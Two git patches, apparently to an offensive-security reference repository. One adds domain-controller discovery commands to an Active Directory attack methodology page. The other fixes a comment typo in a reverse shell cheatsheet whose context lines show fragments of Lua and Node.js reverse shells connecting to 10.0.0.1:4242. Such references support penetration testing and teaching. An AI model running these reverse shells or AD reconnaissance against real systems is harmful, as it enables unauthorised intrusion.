From 310338b279a74dabcea688e1743fc8da4dc0055e Mon Sep 17 00:00:00 2001 From: Seb <5796850+sebch-@users.noreply.github.com> Date: Tue, 2 Aug 2022 15:09:23 +0200 Subject: [PATCH 1/2] Update Active Directory Attack.md Find AD --- Methodology and Resources/Active Directory Attack.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a7c3d4c..033c61e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -460,10 +460,15 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun ### Other Interesting Commands -- **Find Domain Controller** +- **Find Domain Controllers** ```ps1 nslookup domain.com nslookup -type=srv _ldap._tcp.dc._msdcs..com + nltest /dclist:domain.com + Get-ADDomainController -filter * | Select-Object name + gpresult /r + $Env:LOGONSERVER + echo %LOGONSERVER% ``` ## Most common paths to AD compromise @@ -3863,4 +3868,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) \ No newline at end of file +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) From bb6c9ed172c673451edef9fde5c0ca8a4ca9d32e Mon Sep 17 00:00:00 2001 From: Spidycodes <40536205+spidyhackx@users.noreply.github.com> Date: Tue, 2 Aug 2022 21:48:07 +0000 Subject: [PATCH 2/2] typo --- Methodology and Resources/Reverse Shell Cheatsheet.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e1da152..01355b3 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") sh.stdout.pipe(client); sh.stderr.pipe(client); }); - return /a/; // Prevents the Node.js application form crashing + return /a/; // Prevents the Node.js application from crashing })();